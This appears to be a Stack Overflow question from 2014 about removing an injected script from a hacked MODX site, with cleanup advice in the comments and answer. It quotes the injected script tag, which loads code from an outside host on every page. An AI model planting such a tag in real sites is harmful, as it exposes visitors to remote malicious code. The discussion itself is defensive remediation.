2

Our modx site now has this line injected at the end of every page:

<noindex>
<script src="//stat.rolledwil.biz/stat.php?17323616676"></script>
</noindex>

right before the final </body> tag!

How do I get rid of this?

Dan
  • 1,257
  • 2
  • 15
  • 31
  • Inform your hosting company. Restore the whole system from known good backups. Find the hole that allowed this and patch it. – DCoder Jul 01 '14 at 10:30
  • "find the hole" ... how do I do that exactly? – Dan Jul 01 '14 at 10:31
  • Found thread about this hack: http://forums.modx.com/thread/?thread=85986 Had to delete and clean some files. Hope it doesn't come back. Not sure how to prevent in future ... – Dan Jul 01 '14 at 10:58
  • Do you have access to the server logs? Apache, iptables, and such? Look trough your web files and find something that you didn't place there. Check the file privileges. That could be a good start. If you use a CMS, be sure you have the latest version. Also check http://security.stackexchange.com/ – Dominik Antal Jul 01 '14 at 11:59
  • MODX Revo has security injury till 2.2.8 version. I think you have modified core/model/modx/modresponse.class.php file. Something like [this](https://www.diigo.com/item/image/3q9lh/sr92?size=o). You have to update MODX core. – rogaldh Jul 01 '14 at 13:32

1 Answers1

0

Try to locate this code in your db: there can be 4 places - plugins, templates, chunks and content (resources) tables - modx_site_plugins, modx_site_templates, modx_site_content, modx_site_htmlsnippets.

After you find it - you can remove via query or manually.

Viktor Matushevskyi
  • 746
  • 11
  • 22